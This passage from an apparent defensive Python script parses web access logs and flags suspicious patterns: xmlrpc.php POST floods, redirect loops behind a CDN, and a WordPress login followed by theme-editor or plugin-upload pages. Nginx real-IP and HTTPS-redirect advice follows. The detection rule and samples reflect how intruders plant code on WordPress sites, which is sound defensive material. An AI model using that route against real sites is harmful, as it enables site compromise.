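ADMIN_TOOLS = {"/wp-admin/theme-editor.php", "/wp-admin/theme-install.php", "/wp-admin/plugin-install.php"}
def admin_after_login(entries):
    """Per client: a POST /wp-login.php answered 302 (WordPress redirects on success and
    re-renders the form with 200 on failure) followed by code-editing or upload pages."""
    logged_in, found = set(), defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == "/wp-login.php" and e["status"] == 302:
            logged_in.add(e["ip"])
        elif e["ip"] in logged_in and e["path"].split("?", 1)[0] in ADMIN_TOOLS:
            found[e["ip"]].append(e["path"])
    return dict(found)

SAMPLE = [  # constructed subset of the lines quoted in the posts above
    '10.50.0.1 - - [06/Sep/2017:19:57:32 +0200] "GET /index.php/en/kontakt HTTP/1.1" 200 16132 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"',
    '10.50.0.1 - - [06/Sep/2017:19:57:32 +0200] "POST /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"',
    '10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "POST /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"',
    '10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"',
    '10.50.0.1 - - [06/Sep/2017:19:57:34 +0200] "GET /index.php/en/kontakt HTTP/1.1" 301 193 "http://polskaszkolaslough.org/index.php/en/kontakt" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"',
    'fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:42 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    'fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    'fhij.abcd.co.id 162.158.178.186 - - [22/Nov/2019:03:57:43 +0000] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    '191.96.249.54 - - [05/Oct/2016:07:56:10 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"',
    '191.96.249.54 - - [05/Oct/2016:07:56:06 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"',
    '191.96.249.54 - - [05/Oct/2016:07:56:09 +0000] "POST /xmlrpc.php HTTP/1.0" 200 560 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"',
    'xx.xx.xx.xx - - [09/Jan/2017:10:24:43 +0100] "POST /wp-login.php HTTP/1.1" 302 4 "/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"',
    'xx.xx.xx.xx - - [09/Jan/2017:10:24:47 +0100] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 183974 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"',
    'xx.xx.xx.xx - - [09/Jan/2017:10:24:49 +0100] "GET /wp-admin/theme-install.php?upload HTTP/1.1" 200 161448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"',
]

if __name__ == "__main__":
    ents = parse(SAMPLE)
    print(nat_masked(ents[:5], "10.50.0.1"), bursts(ents[:5], lambda e: e["ip"]), redirect_loops(ents))
    print(behind_cdn("162.158.178.186"), post_flood(ents), admin_after_login(ents))
```

Two caveats follow from the checks. When the client address belongs to a CDN or reverse proxy, the logged address is the edge's, so configure nginx's real_ip module (set_real_ip_from for the edge ranges, real_ip_header CF-Connecting-IP or X-Forwarded-For) and trust that header only from those ranges; otherwise the log, fail2ban and every per-IP rule act on the edge. And an edge that terminates TLS and fetches from the origin over port 80 is the classic way a blanket `return 301 https://...` on the port-80 server produces exactly the run of 301s shown in the reverse-proxy question: redirect only when the forwarded protocol is not https, or make the edge use HTTPS to the origin.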
